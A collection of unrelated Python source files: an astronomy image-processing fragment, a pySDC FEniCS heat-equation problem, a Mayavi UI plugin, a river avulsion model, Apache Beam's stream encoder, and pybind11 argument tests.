# extrapolate to original array size, zero outside
argR_r = ((np.arange(rows) - r0)/rblk).clip(0,rblks-1).astype(int)
argC_c = ((np.arange(cols) - c0)/cblk).clip(0,cblks-1).astype(int)
r0,r1 = np.where(arr_rc.sum(axis=1)>0)[0][[0,-1]]
c0,c1 = np.where(arr_rc.sum(axis=0)>0)[0][[0,-1]]
arr_rc[r0-rblk/2:r0,c0:c1+1] += arr_rc[r0,c0:c1+1] + \
dadr_RC[argR[0],argC_c[c0:c1+1]]*(np.arange(-int(rblk/2),0)[:,None])
arr_rc[r1+1:r1+rblk/2,c0:c1+1] += arr_rc[r1,c0:c1+1] + \
dadr_RC[argR[-1]-1,argC_c[c0:c1+1]]*(np.arange(1,rblk/2)[:,None])
arr_rc[r0-rblk/2:r1+rblk/2,c0-cblk/2:c0] += arr_rc[r0-rblk/2:r1+rblk/2,c0][:,None] + \
dadc_RC[argR_r[r0-rblk/2:r1+rblk/2],argC[0]][:,None]*np.arange(-int(cblk/2),0)
arr_rc[r0-rblk/2:r1+rblk/2,c1+1:c1+cblk/2] += arr_rc[r0-rblk/2:r1+rblk/2,c1][:,None] + \
dadc_RC[argR_r[r0-rblk/2:r1+rblk/2],argC[-1]-1][:,None]*np.arange(1,cblk/2)
arr_rc[((np.abs(r_rc-rcenter) > drdat/2) | (np.abs(c_rc-ccenter) > dcdat/2))] = 0.
if debug:
pyfits.PrimaryHDU(arr_rc.astype('float32')).writeto('arr_rc_1.fits',overwrite=True)
return arr_rc
# ----------------------------------------------------------
def fence(arr):
# return lower outer, lower inner, upper inner, and upper outer quartile fence
Q1,Q3 = np.percentile(arr,(25.,75.))
IQ = Q3-Q1
return Q1-3*IQ, Q1-1.5*IQ, Q3+1.5*IQ, Q3+3*IQ
# ---------------------------------------------------------------------------------
def printstdlog(string,logfile):
print string
print >>open(logfile,'a'), string
return
|
|
import logging
import dolfin as df
import numpy as np
from pySDC.core.Errors import ParameterError
from pySDC.core.Problem import ptype
from pySDC.implementations.datatype_classes.fenics_mesh import fenics_mesh, rhs_fenics_mesh
# noinspection PyUnusedLocal
class fenics_heat(ptype):
"""
Example implementing the forced 1D heat equation with Dirichlet-0 BC in [0,1]
Attributes:
V: function space
M: mass matrix for FEM
K: stiffness matrix incl. diffusion coefficient (and correct sign)
g: forcing term
bc: boundary conditions
"""
def __init__(self, problem_params, dtype_u=fenics_mesh, dtype_f=rhs_fenics_mesh):
"""
Initialization routine
Args:
problem_params (dict): custom parameters for the example
dtype_u: FEniCS mesh data type (will be passed to parent class)
dtype_f: FEniCS mesh data data type with implicit and explicit parts (will be passed to parent class)
"""
# define the Dirichlet boundary
# def Boundary(x, on_boundary):
# return on_boundary
# these parameters will be used later, so assert their existence
essential_keys = ['c_nvars', 't0', 'family', 'order', 'refinements', 'nu']
for key in essential_keys:
if key not in problem_params:
msg = 'need %s to instantiate problem, only got %s' % (key, str(problem_params.keys()))
raise ParameterError(msg)
# set logger level for FFC and dolfin
logging.getLogger('FFC').setLevel(logging.WARNING)
logging.getLogger('UFL').setLevel(logging.WARNING)
# set solver and form parameters
df.parameters["form_compiler"]["optimize"] = True
df.parameters["form_compiler"]["cpp_optimize"] = True
df.parameters['allow_extrapolation'] = True
# set mesh and refinement (for multilevel)
mesh = df.UnitIntervalMesh(problem_params['c_nvars'])
for _ in range(problem_params['refinements']):
mesh = df.refine(mesh)
# define function space for future reference
self.V = df.FunctionSpace(mesh, problem_params['family'], problem_params['order'])
tmp = df.Function(self.V)
print('DoFs on this level:', len(tmp.vector()[:]))
# invoke super init, passing number of dofs, dtype_u and dtype_f
super(fenics_heat, self).__init__(self.V, dtype_u, dtype_f, problem_params)
# Stiffness term (Laplace)
u = df.TrialFunction(self.V)
v = df.TestFunction(self.V)
a_K = -1.0 * df.inner(df.nabla_grad(u), self.params.nu * df.nabla_grad(v)) * df.dx
# Mass term
a_M = u * v * df.dx
self.M = df.assemble(a_M)
self.K = df.assemble(a_K)
# set forcing term as expression
self.g = df.Expression('-cos(a*x[0]) * (sin(t) - b*a*a*cos(t))', a=np.pi, b=self.params.nu, t=self.params.t0,
degree=self.params.order)
# self.g = df.Expression('0', a=np.pi, b=self.params.nu, t=self.params.t0,
# degree=self.params.order)
# set boundary values
# bc = df.DirichletBC(self.V, df.Constant(0.0), Boundary)
#
# bc.apply(self.M)
# bc.apply(self.K)
def solve_system(self, rhs, factor, u0, t):
"""
Dolfin's linear solver for (M-dtA)u = rhs
Args:
rhs (dtype_f): right-hand side for the nonlinear system
factor (float): abbrev. for the node-to-node stepsize (or any other factor required)
u0 (dtype_u_: initial guess for the iterative solver (not used here so far)
t (float): current time
Returns:
dtype_u: solution as mesh
"""
b = self.apply_mass_matrix(rhs)
u = self.dtype_u(u0)
df.solve(self.M - factor * self.K, u.values.vector(), b.values.vector())
return u
def __eval_fexpl(self, u, t):
"""
Helper routine to evaluate the explicit part of the RHS
Args:
u (dtype_u): current values (not used here)
t (fliat): current time
Returns:
explicit part of RHS
"""
self.g.t = t
fexpl = self.dtype_u(df.interpolate(self.g, self.V))
return fexpl
def __eval_fimpl(self, u, t):
"""
Helper routine to evaluate the implicit part of the RHS
Args:
u (dtype_u): current values
t (float): current time (not used here)
Returns:
implicit part of RHS
"""
tmp = self.dtype_u(self.V)
self.K.mult(u.values.vector(), tmp.values.vector())
fimpl = self.__invert_mass_matrix(tmp)
return fimpl
def eval_f(self, u, t):
"""
Routine to evaluate both parts of the RHS
Args:
u (dtype_u): current values
t (float): current time
Returns:
dtype_f: the RHS divided into two parts
"""
f = self.dtype_f(self.V)
f.impl = self.__eval_fimpl(u, t)
f.expl = self.__eval_fexpl(u, t)
return f
def apply_mass_matrix(self, u):
"""
Routine to apply mass matrix
Args:
u (dtype_u): current values
Returns:
dtype_u: M*u
"""
me = self.dtype_u(self.V)
self.M.mult(u.values.vector(), me.values.vector())
return me
def __invert_mass_matrix(self, u):
"""
Helper routine to invert mass matrix
Args:
u (dtype_u): current values
Returns:
dtype_u: inv(M)*u
"""
me = self.dtype_u(self.V)
b = self.dtype_u(u)
df.solve(self.M, me.values.vector(), b.values.vector())
return me
def u_exact(self, t):
"""
Routine to compute the exact solution at time t
Args:
t (float): current time
Returns:
dtype_u: exact solution
"""
u0 = df.Expression('cos(a*x[0]) * cos(t)', a=np.pi, t=t, degree=self.params.order)
me = self.dtype_u(df.interpolate(u0, self.V))
return me
# noinspection PyUnusedLocal
class fenics_heat_mass(fenics_heat):
"""
Example implementing the forced 1D heat equation with Dirichlet-0 BC in [0,1], expects mass matrix sweeper
"""
def solve_system(self, rhs, factor, u0, t):
"""
Dolfin's linear solver for (M-dtA)u = rhs
Args:
rhs (dtype_f): right-hand side for the nonlinear system
factor (float): abbrev. for the node-to-node stepsize (or any other factor required)
u0 (dtype_u_: initial guess for the iterative solver (not used here so far)
t (float): current time
Returns:
dtype_u: solution as mesh
"""
u = self.dtype_u(u0)
df.solve(self.M - factor * self.K, u.values.vector(), rhs.values.vector())
return u
def eval_f(self, u, t):
"""
Routine to evaluate both parts of the RHS
Args:
u (dtype_u): current values
t (float): current time
Returns:
dtype_f: the RHS divided into two parts
"""
f = self.dtype_f(self.V)
self.K.mult(u.values.vector(), f.impl.values.vector())
self.g.t = t
f.expl = self.dtype_u(df.interpolate(self.g, self.V))
f.expl = self.apply_mass_matrix(f.expl)
return f
|
|
"""The Mayavi UI plugin
"""
# Author: Prabhu Ramachandran <prabhu [at] aero . iitb . ac . in>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
# Standard library imports.
import logging
# Enthought library imports.
from traits.api import List, on_trait_change
from envisage.api import Plugin
from pyface.workbench.api import Perspective, PerspectiveItem
from traits.etsconfig.api import ETSConfig
logger = logging.getLogger()
# View IDs.
ENGINE_VIEW = 'mayavi.core.ui.engine_view.EngineView'
CURRENT_SELECTION_VIEW = 'mayavi.core.engine.Engine.current_selection'
SHELL_VIEW = 'envisage.plugins.python_shell_view'
LOGGER_VIEW = 'apptools.logger.plugin.view.logger_view.LoggerView'
###############################################################################
# `MayaviPerspective` class.
###############################################################################
class MayaviPerspective(Perspective):
""" A default perspective for Mayavi. """
# The perspective's name.
name = 'Mayavi'
# Should this perspective be enabled or not?
enabled = True
# Should the editor area be shown in this perspective?
show_editor_area = True
# The contents of the perspective.
contents = List()
def _contents_default(self):
contents = [
PerspectiveItem(id=ENGINE_VIEW, position='left'),
PerspectiveItem(id=CURRENT_SELECTION_VIEW, position='bottom',
relative_to=ENGINE_VIEW),
PerspectiveItem(id=SHELL_VIEW, position='bottom'),
]
show_logger = True
if ETSConfig.toolkit == 'wx':
# XXX: Bugware: avoid a crash in Wx with the logger
import wx
if wx.__version__.split('.')[:2] == ['2', '6']:
show_logger = False
if show_logger:
contents.append(PerspectiveItem(id=LOGGER_VIEW, position='with',
relative_to=SHELL_VIEW))
return contents
###############################################################################
# `MayaviUIPlugin` class.
###############################################################################
class MayaviUIPlugin(Plugin):
# Extension point Ids.
VIEWS = 'envisage.ui.workbench.views'
PERSPECTIVES = 'envisage.ui.workbench.perspectives'
PREFERENCES_PAGES = 'envisage.ui.workbench.preferences_pages'
ACTION_SETS = 'envisage.ui.workbench.action_sets'
BANNER = 'envisage.plugins.ipython_shell.banner'
# The plugins name.
name = 'Mayavi UI plugin'
# Our ID.
id = 'mayavi_ui'
###### Contributions to extension points made by this plugin ######
# Views.
views = List(contributes_to=VIEWS)
# Perspectives.
perspectives = List(contributes_to=PERSPECTIVES)
# Preferences pages.
preferences_pages = List(contributes_to=PREFERENCES_PAGES)
# Our action sets.
action_sets = List(contributes_to=ACTION_SETS)
# IPython banner
banner = List(contributes_to=BANNER)
def _views_default(self):
""" Trait initializer. """
return [self._engine_view_factory,
self._current_selection_view_factory]
def _perspectives_default(self):
""" Trait initializer. """
return [MayaviPerspective]
def _preferences_pages_default(self):
""" Trait initializer. """
from mayavi.preferences.mayavi_preferences_page import (
MayaviRootPreferencesPage, MayaviMlabPreferencesPage)
return [MayaviRootPreferencesPage, MayaviMlabPreferencesPage]
def _action_sets_default(self):
""" Trait initializer. """
from mayavi.plugins.mayavi_ui_action_set import (
MayaviUIActionSet
)
return [MayaviUIActionSet]
def _banner_default(self):
"""Trait initializer """
return ["""Welcome to Mayavi, this is the interactive IPython shell.
If this is your first time using Mayavi, take a quick look at the tutorial examples section of the user guide, accessible via the help menu.
To use Mayavi, you need to load your data in "data sources" and apply "visualization modules" to it.
"""]
######################################################################
# Private methods.
def _engine_view_factory(self, window, **traits):
""" Factory method for engine views. """
from pyface.workbench.traits_ui_view import \
TraitsUIView
from mayavi.core.ui.engine_view import \
EngineView
engine_view = EngineView(engine=self._get_engine(window))
tui_engine_view = TraitsUIView(obj=engine_view,
id=ENGINE_VIEW,
name='Mayavi',
window=window,
position='left',
**traits
)
return tui_engine_view
def _current_selection_view_factory(self, window, **traits):
""" Factory method for the current selection of the engine. """
from pyface.workbench.traits_ui_view import \
TraitsUIView
engine = self._get_engine(window)
tui_engine_view = TraitsUIView(obj=engine,
view='current_selection_view',
id=CURRENT_SELECTION_VIEW,
name='Mayavi object editor',
window=window,
position='bottom',
relative_to=ENGINE_VIEW,
**traits
)
return tui_engine_view
def _get_engine(self, window):
"""Return the Mayavi engine of the particular window."""
from mayavi.core.engine import Engine
return window.get_service(Engine)
def _get_script(self, window):
"""Return the `mayavi.plugins.script.Script` instance
of the window."""
from mayavi.plugins.script import Script
return window.get_service(Script)
######################################################################
# Trait handlers.
@on_trait_change('application.gui:started')
def _on_application_gui_started(self, obj, trait_name, old, new):
"""This is called when the application's GUI is started. The
method binds the `Script` and `Engine` instance on the
interpreter.
"""
# This is called when the application trait is set but we don't
# want to do anything at that point.
if trait_name != 'started' or not new:
return
# Get the script service.
app = self.application
window = app.workbench.active_window
script = self._get_script(window)
# Get a hold of the Python shell view.
id = SHELL_VIEW
py = window.get_view_by_id(id)
if py is None:
logger.warn('*'*80)
logger.warn("Can't find the Python shell view to bind variables")
return
# Bind the script and engine instances to names on the
# interpreter.
try:
py.bind('mayavi', script)
py.bind('engine', script.engine)
# The following will fail under Qt, as it needs the Pyface
# Tree that has not been ported from Wx yet.
from apptools.naming.ui.api import explore
py.bind('explore', explore)
except AttributeError, msg:
# This can happen when the shell is not visible.
# FIXME: fix this when the shell plugin is improved.
logger.warn(msg)
logger.warn("Can't find the Python shell to bind variables")
|
|
#! /usr/local/bin/python
import numpy as np
import math
from six.moves import range
from . import steep_desc, downcut, FP
from .diffuse import calc_crevasse_dep
from .avulsion_utils import (
find_point_in_path,
channel_is_superelevated,
find_path_length,
find_riv_path_length,
set_linear_slope,
fill_abandoned_channel,
)
def avulse_to_new_path(z, old, new, sea_level, channel_depth, avulsion_type,
slope, dx=1., dy=1.,):
"""Avulse the river to a new path.
Given two river paths, *old* and *new*, avulse the river to a new river
path. If the end point of the new path is contained in the old river
path, the resulting path is the new path up until this point and then
the old path. Otherwise, the resulting path is the new river path and
will be downcut.
Parameters
----------
z : ndarray
2D array of elevations.
old : tuple of array_like
Tuple of i and j indices (into *z*) for the old path.
new : tuple of array_like
Tuple of i and j indices (into *z*) for the new path.
sea_level : float
Elevation of sea level.
channel_depth : float
Depth of the channel.
avulsion_type : {0, 1, 2, 3}
The type of the avulsion.
dx : float, optional
Spacing of columns of *z*.
dy : float, optional
Spacing of rows of *z*.
Returns
-------
tuple
Tuple of the new river path (as i, j indices) and the, possibly
changed, avulsion type.
Examples
--------
The following example uses a grid that looks like::
o + * *
* o + *
* * + *
* * o *
* o * *
The old path is marked by `o`, the new path but `+`. The paths overlap
(2, 2).
>>> import numpy as np
>>> z = np.ones((5, 4), dtype=float)
>>> old = np.array((0, 1, 2, 3, 4)), np.array((0, 1, 2, 2, 1))
>>> new = np.array((0, 1, 2)), np.array((1, 2, 2))
>>> (new, atype) = avulse_to_new_path(z, old, new, 0., 0., 0)
The new path follows the new path until the common point and then
follows the old path. The new avulsion type is now 2.
>>> new
(array([0, 1, 2, 3, 4]), array([1, 2, 2, 2, 1]))
>>> atype
2
In this example the old and new paths do not overlap::
o + * *
* o + *
* * o +
* * o +
* o * +
>>> old = np.array((0, 1, 2, 3, 4)), np.array((0, 1, 2, 2, 1))
>>> new = np.array((0, 1, 2, 3, 4)), np.array((1, 2, 3, 3, 3))
>>> (new, atype) = avulse_to_new_path(z, old, new, 0., 0., 0)
The new path is now, in fact, the actual new path and the avulsion
type is unchanged.
>>> new
(array([0, 1, 2, 3, 4]), array([1, 2, 3, 3, 3]))
>>> atype
0
"""
old_i, old_j = old
new_i, new_j = new
# sets avulsion to be regional, may be updated again below (if local)
# maybe this should be len(test_old_x)-1?
ind = find_point_in_path((old_i, old_j), (new_i[-1], new_j[-1]))
if ind is not None:
avulsion_type = 2
downcut.cut_local(new_i, new_j, z, dx=dx, dy=dy)
new_i = np.append(new_i, old_i[ind + 1:])
new_j = np.append(new_j, old_j[ind + 1:])
else:
max_cell_h = slope * dx
if (z[new_i[-1], new_j[-1]] - sea_level) < (0.001 * max_cell_h):
z[new_i[-1], new_j[-1]] = (0.001 * max_cell_h) + sea_level
downcut.cut_new(new_i, new_j, z, sea_level, channel_depth,
dx=dx, dy=dy)
return (new_i, new_j), avulsion_type
# determines if there is an avulsion along river course
def find_avulsion(riv_i, riv_j, n, super_ratio, current_SL, ch_depth,
short_path, splay_type, slope, splay_depth,
nu, dt, dx=1., dy=1.):
new = riv_i, riv_j
old = riv_i, riv_j
avulsion_type = 0
a = 0
loc = 0
avulse_length = 0
new_length = 0
new_course_length = 0
avul_locs = np.zeros(0, dtype=np.int)
path_slopes = np.zeros(0)
crevasse_locs = np.zeros(3, dtype=np.int)
path_diff = np.zeros(0)
path_difference = 0
old_length = find_riv_path_length(n, old, current_SL, ch_depth,
slope, dx=dx, dy=dy)
for a in range(1, len(riv_i)-1):
if channel_is_superelevated(n, (riv_i[a], riv_j[a]),
(riv_i[a-1], riv_j[a-1]),
ch_depth, super_ratio, current_SL):
# if superelevation greater than trigger ratio, determine
# new steepest descent path
new = steep_desc.find_course(n, riv_i, riv_j, a, ch_depth,
sea_level=current_SL)
if n[new[0][-1], new[1][-1]] < current_SL:
new_length = find_riv_path_length(n, new, current_SL, ch_depth,
slope, dx=dx, dy=dy)
else:
new_length = find_path_length(n, new, current_SL, ch_depth,
slope, dx=dx, dy=dy)
if new_length < old_length:
# calculate slope of new path
if len(new[0][a:]) <= 1:
avulsed_length = find_path_length(n, (new[0][a-1:], new[1][a-1:]),
current_SL, ch_depth, slope,
dx=dx, dy=dy)
slope_new_path = ((n[new[0][-2], new[1][-2]] - n[new[0][-1], new[1][-1]])
/ avulsed_length)
elif n[new[0][-1], new[1][-1]] < current_SL:
avulsed_length = find_riv_path_length(n, (new[0][a:], new[1][a:]),
current_SL, ch_depth,
slope, dx=dx, dy=dy)
slope_new_path = ((n[new[0][a], new[1][a]] - n[new[0][-1], new[1][-1]])
/ avulsed_length)
else:
avulsed_length = find_path_length(n, (new[0][a:], new[1][a:]),
current_SL, ch_depth, slope,
dx=dx, dy=dy)
slope_new_path = ((n[new[0][a], new[1][a]] - n[new[0][-1], new[1][-1]])
/ avulsed_length)
avul_locs = np.append(avul_locs, a)
path_slopes = np.append(path_slopes, slope_new_path)
path_diff = np.append(path_diff, (old_length - new_length))
crevasse_locs = np.vstack((crevasse_locs, [new[0][a], new[1][a], a]))
if (crevasse_locs.sum() > 0):
crevasse_locs = np.delete(crevasse_locs, 0, 0)
if avul_locs.size > 0:
max_slope = np.argmax(path_slopes)
loc = avul_locs[max_slope]
path_difference = path_diff[max_slope]
new = steep_desc.find_course(n, riv_i, riv_j, loc, ch_depth,
sea_level=current_SL)
avulsion_type = 1
new, avulsion_type = avulse_to_new_path(n,
(riv_i[loc - 1:], riv_j[loc - 1:]),
(new[0][loc - 1:], new[1][loc - 1:]),
current_SL, ch_depth, avulsion_type,
slope, dx=dx, dy=dy)
new = (np.append(riv_i[:loc - 1], new[0]),
np.append(riv_j[:loc - 1], new[1]))
avulse_length = find_riv_path_length(n, (riv_i[loc:], riv_j[loc:]),
current_SL, ch_depth,
slope, dx=dx, dy=dy)
# fill up old channel... could be some fraction in the future
# (determines whether channels are repellors or attractors)
fill_abandoned_channel(loc, n, new, riv_i, riv_j, current_SL,
ch_depth, slope, dx)
crevasse_locs = np.delete(crevasse_locs, max_slope, 0)
else:
new = riv_i, riv_j
if (crevasse_locs.sum() > 0) and (splay_type > 0):
n_before_splay = np.copy(n)
# Don' think we need to worry about preserving old river elevations??
# old_river_elevations = n[riv_i, riv_j]
new_river_elevations = n[new[0], new[1]]
for i in range(crevasse_locs.shape[0]):
splay_dep = calc_crevasse_dep(dx, dy, nu, dt, ch_depth, riv_i, riv_j, n,
current_SL, slope, crevasse_locs[i][2])
if splay_dep > 0:
FP.dep_splay(n, (crevasse_locs[i][0], crevasse_locs[i][1]),
splay_dep, splay_type=splay_type)
# n[riv_i, riv_j] = old_river_elevations
n[new[0], new[1]] = new_river_elevations
n_splay = n - n_before_splay
splay_depth += n_splay
return (new, avulsion_type, loc, avulse_length, path_difference, splay_depth)
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A pure Python implementation of stream.pyx.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import struct
import sys
from builtins import chr
from builtins import object
from typing import List
class OutputStream(object):
"""For internal use only; no backwards-compatibility guarantees.
A pure Python implementation of stream.OutputStream."""
def __init__(self):
self.data = [] # type: List[bytes]
self.byte_count = 0
def write(self, b, nested=False):
# type: (bytes, bool) -> None
assert isinstance(b, bytes)
if nested:
self.write_var_int64(len(b))
self.data.append(b)
self.byte_count += len(b)
def write_byte(self, val):
self.data.append(chr(val).encode('latin-1'))
self.byte_count += 1
def write_var_int64(self, v):
# type: (int) -> None
if v < 0:
v += 1 << 64
if v <= 0:
raise ValueError('Value too large (negative).')
while True:
bits = v & 0x7F
v >>= 7
if v:
bits |= 0x80
self.write_byte(bits)
if not v:
break
def write_bigendian_int64(self, v):
self.write(struct.pack('>q', v))
def write_bigendian_uint64(self, v):
self.write(struct.pack('>Q', v))
def write_bigendian_int32(self, v):
self.write(struct.pack('>i', v))
def write_bigendian_double(self, v):
self.write(struct.pack('>d', v))
def get(self):
# type: () -> bytes
return b''.join(self.data)
def size(self):
# type: () -> int
return self.byte_count
def _clear(self):
# type: () -> None
self.data = []
self.byte_count = 0
class ByteCountingOutputStream(OutputStream):
"""For internal use only; no backwards-compatibility guarantees.
A pure Python implementation of stream.ByteCountingOutputStream."""
def __init__(self):
# Note that we don't actually use any of the data initialized by our super.
super(ByteCountingOutputStream, self).__init__()
self.count = 0
def write(self, byte_array, nested=False):
# type: (bytes, bool) -> None
blen = len(byte_array)
if nested:
self.write_var_int64(blen)
self.count += blen
def write_byte(self, _):
self.count += 1
def get_count(self):
return self.count
def get(self):
raise NotImplementedError
def __str__(self):
return '<%s %s>' % (self.__class__.__name__, self.count)
class InputStream(object):
"""For internal use only; no backwards-compatibility guarantees.
A pure Python implementation of stream.InputStream."""
def __init__(self, data):
# type: (bytes) -> None
self.data = data
self.pos = 0
# The behavior of looping over a byte-string and obtaining byte characters
# has been changed between python 2 and 3.
# b = b'\xff\x01'
# Python 2:
# b[0] = '\xff'
# ord(b[0]) = 255
# Python 3:
# b[0] = 255
if sys.version_info[0] >= 3:
self.read_byte = self.read_byte_py3
else:
self.read_byte = self.read_byte_py2
def size(self):
return len(self.data) - self.pos
def read(self, size):
# type: (int) -> bytes
self.pos += size
return self.data[self.pos - size:self.pos]
def read_all(self, nested):
# type: (bool) -> bytes
return self.read(self.read_var_int64() if nested else self.size())
def read_byte_py2(self):
# type: () -> int
self.pos += 1
# mypy tests against python 3.x, where this is an error:
return ord(self.data[self.pos - 1]) # type: ignore[arg-type]
def read_byte_py3(self):
# type: () -> int
self.pos += 1
return self.data[self.pos - 1]
def read_var_int64(self):
shift = 0
result = 0
while True:
byte = self.read_byte()
if byte < 0:
raise RuntimeError('VarLong not terminated.')
bits = byte & 0x7F
if shift >= 64 or (shift >= 63 and bits > 1):
raise RuntimeError('VarLong too long.')
result |= bits << shift
shift += 7
if not byte & 0x80:
break
if result >= 1 << 63:
result -= 1 << 64
return result
def read_bigendian_int64(self):
return struct.unpack('>q', self.read(8))[0]
def read_bigendian_uint64(self):
return struct.unpack('>Q', self.read(8))[0]
def read_bigendian_int32(self):
return struct.unpack('>i', self.read(4))[0]
def read_bigendian_double(self):
return struct.unpack('>d', self.read(8))[0]
def get_varint_size(v):
"""For internal use only; no backwards-compatibility guarantees.
Returns the size of the given integer value when encode as a VarInt."""
if v < 0:
v += 1 << 64
if v <= 0:
raise ValueError('Value too large (negative).')
varint_size = 0
while True:
varint_size += 1
v >>= 7
if not v:
break
return varint_size
|
|
# -*- coding: utf-8 -*-
import pytest
import env # noqa: F401
from pybind11_tests import kwargs_and_defaults as m
def test_function_signatures(doc):
assert doc(m.kw_func0) == "kw_func0(arg0: int, arg1: int) -> str"
assert doc(m.kw_func1) == "kw_func1(x: int, y: int) -> str"
assert doc(m.kw_func2) == "kw_func2(x: int = 100, y: int = 200) -> str"
assert doc(m.kw_func3) == "kw_func3(data: str = 'Hello world!') -> None"
assert doc(m.kw_func4) == "kw_func4(myList: List[int] = [13, 17]) -> str"
assert doc(m.kw_func_udl) == "kw_func_udl(x: int, y: int = 300) -> str"
assert doc(m.kw_func_udl_z) == "kw_func_udl_z(x: int, y: int = 0) -> str"
assert doc(m.args_function) == "args_function(*args) -> tuple"
assert doc(m.args_kwargs_function) == "args_kwargs_function(*args, **kwargs) -> tuple"
assert doc(m.KWClass.foo0) == \
"foo0(self: m.kwargs_and_defaults.KWClass, arg0: int, arg1: float) -> None"
assert doc(m.KWClass.foo1) == \
"foo1(self: m.kwargs_and_defaults.KWClass, x: int, y: float) -> None"
def test_named_arguments(msg):
assert m.kw_func0(5, 10) == "x=5, y=10"
assert m.kw_func1(5, 10) == "x=5, y=10"
assert m.kw_func1(5, y=10) == "x=5, y=10"
assert m.kw_func1(y=10, x=5) == "x=5, y=10"
assert m.kw_func2() == "x=100, y=200"
assert m.kw_func2(5) == "x=5, y=200"
assert m.kw_func2(x=5) == "x=5, y=200"
assert m.kw_func2(y=10) == "x=100, y=10"
assert m.kw_func2(5, 10) == "x=5, y=10"
assert m.kw_func2(x=5, y=10) == "x=5, y=10"
with pytest.raises(TypeError) as excinfo:
# noinspection PyArgumentList
m.kw_func2(x=5, y=10, z=12)
assert excinfo.match(
r'(?s)^kw_func2\(\): incompatible.*Invoked with: kwargs: ((x=5|y=10|z=12)(, |$))' + '{3}$')
assert m.kw_func4() == "{13 17}"
assert m.kw_func4(myList=[1, 2, 3]) == "{1 2 3}"
assert m.kw_func_udl(x=5, y=10) == "x=5, y=10"
assert m.kw_func_udl_z(x=5) == "x=5, y=0"
def test_arg_and_kwargs():
args = 'arg1_value', 'arg2_value', 3
assert m.args_function(*args) == args
args = 'a1', 'a2'
kwargs = dict(arg3='a3', arg4=4)
assert m.args_kwargs_function(*args, **kwargs) == (args, kwargs)
def test_mixed_args_and_kwargs(msg):
mpa = m.mixed_plus_args
mpk = m.mixed_plus_kwargs
mpak = m.mixed_plus_args_kwargs
mpakd = m.mixed_plus_args_kwargs_defaults
assert mpa(1, 2.5, 4, 99.5, None) == (1, 2.5, (4, 99.5, None))
assert mpa(1, 2.5) == (1, 2.5, ())
with pytest.raises(TypeError) as excinfo:
assert mpa(1)
assert msg(excinfo.value) == """
mixed_plus_args(): incompatible function arguments. The following argument types are supported:
1. (arg0: int, arg1: float, *args) -> tuple
Invoked with: 1
""" # noqa: E501 line too long
with pytest.raises(TypeError) as excinfo:
assert mpa()
assert msg(excinfo.value) == """
mixed_plus_args(): incompatible function arguments. The following argument types are supported:
1. (arg0: int, arg1: float, *args) -> tuple
Invoked with:
""" # noqa: E501 line too long
assert mpk(-2, 3.5, pi=3.14159, e=2.71828) == (-2, 3.5, {'e': 2.71828, 'pi': 3.14159})
assert mpak(7, 7.7, 7.77, 7.777, 7.7777, minusseven=-7) == (
7, 7.7, (7.77, 7.777, 7.7777), {'minusseven': -7})
assert mpakd() == (1, 3.14159, (), {})
assert mpakd(3) == (3, 3.14159, (), {})
assert mpakd(j=2.71828) == (1, 2.71828, (), {})
assert mpakd(k=42) == (1, 3.14159, (), {'k': 42})
assert mpakd(1, 1, 2, 3, 5, 8, then=13, followedby=21) == (
1, 1, (2, 3, 5, 8), {'then': 13, 'followedby': 21})
# Arguments specified both positionally and via kwargs should fail:
with pytest.raises(TypeError) as excinfo:
assert mpakd(1, i=1)
assert msg(excinfo.value) == """
mixed_plus_args_kwargs_defaults(): incompatible function arguments. The following argument types are supported:
1. (i: int = 1, j: float = 3.14159, *args, **kwargs) -> tuple
Invoked with: 1; kwargs: i=1
""" # noqa: E501 line too long
with pytest.raises(TypeError) as excinfo:
assert mpakd(1, 2, j=1)
assert msg(excinfo.value) == """
mixed_plus_args_kwargs_defaults(): incompatible function arguments. The following argument types are supported:
1. (i: int = 1, j: float = 3.14159, *args, **kwargs) -> tuple
Invoked with: 1, 2; kwargs: j=1
""" # noqa: E501 line too long
def test_keyword_only_args(msg):
assert m.kw_only_all(i=1, j=2) == (1, 2)
assert m.kw_only_all(j=1, i=2) == (2, 1)
with pytest.raises(TypeError) as excinfo:
assert m.kw_only_all(i=1) == (1,)
assert "incompatible function arguments" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
assert m.kw_only_all(1, 2) == (1, 2)
assert "incompatible function arguments" in str(excinfo.value)
assert m.kw_only_some(1, k=3, j=2) == (1, 2, 3)
assert m.kw_only_with_defaults(z=8) == (3, 4, 5, 8)
assert m.kw_only_with_defaults(2, z=8) == (2, 4, 5, 8)
assert m.kw_only_with_defaults(2, j=7, k=8, z=9) == (2, 7, 8, 9)
assert m.kw_only_with_defaults(2, 7, z=9, k=8) == (2, 7, 8, 9)
assert m.kw_only_mixed(1, j=2) == (1, 2)
assert m.kw_only_mixed(j=2, i=3) == (3, 2)
assert m.kw_only_mixed(i=2, j=3) == (2, 3)
assert m.kw_only_plus_more(4, 5, k=6, extra=7) == (4, 5, 6, {'extra': 7})
assert m.kw_only_plus_more(3, k=5, j=4, extra=6) == (3, 4, 5, {'extra': 6})
assert m.kw_only_plus_more(2, k=3, extra=4) == (2, -1, 3, {'extra': 4})
with pytest.raises(TypeError) as excinfo:
assert m.kw_only_mixed(i=1) == (1,)
assert "incompatible function arguments" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
m.register_invalid_kw_only(m)
assert msg(excinfo.value) == """
arg(): cannot specify an unnamed argument after an kw_only() annotation
"""
def test_positional_only_args(msg):
assert m.pos_only_all(1, 2) == (1, 2)
assert m.pos_only_all(2, 1) == (2, 1)
with pytest.raises(TypeError) as excinfo:
m.pos_only_all(i=1, j=2)
assert "incompatible function arguments" in str(excinfo.value)
assert m.pos_only_mix(1, 2) == (1, 2)
assert m.pos_only_mix(2, j=1) == (2, 1)
with pytest.raises(TypeError) as excinfo:
m.pos_only_mix(i=1, j=2)
assert "incompatible function arguments" in str(excinfo.value)
assert m.pos_kw_only_mix(1, 2, k=3) == (1, 2, 3)
